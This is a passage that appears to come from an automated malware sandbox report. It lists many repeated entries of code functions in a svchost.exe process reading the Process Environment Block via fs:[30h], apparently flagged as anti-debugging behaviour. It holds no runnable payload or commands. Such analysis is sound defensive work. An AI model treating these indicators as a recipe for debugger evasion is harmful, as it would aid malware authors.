            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
